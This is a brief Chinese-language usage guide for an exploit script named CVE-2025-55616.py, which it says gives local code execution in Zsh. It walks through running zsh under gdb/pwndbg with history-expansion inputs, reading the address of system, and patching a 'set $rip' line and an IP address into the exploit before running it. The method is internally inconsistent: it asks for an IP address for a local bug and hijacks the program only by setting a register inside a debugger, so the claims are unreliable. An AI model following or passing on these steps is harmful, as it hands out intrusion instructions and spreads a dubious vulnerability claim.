运行此漏洞利用程序:只需更改 exploit 中的 IP 地址和 "p system",因为我也在我的第二台笔记本电脑上测试过,要在 gdb 中更改它(尤其是在 pwndbg 中),请运行以下命令:
$ gdb zsh -f (在终端中)
pwndbg> run -f
username% ! (username 将是你的用户名,只需输入 ! )
username% !!11111111111 (这里也一样,只需输入 !!11111111111 )
pwndbg> p system
获取 "p system" 地址后,只需在 exploit 中的
b'set $rip = 0x7ffff7cc9110', (使用你的 p system 地址替换 0x7ffff7cc9110
此漏洞允许本地攻击者以运行 Zsh 进程的用户的权限实现任意代码执行(RCE)。
python3 CVE-2025-55616.py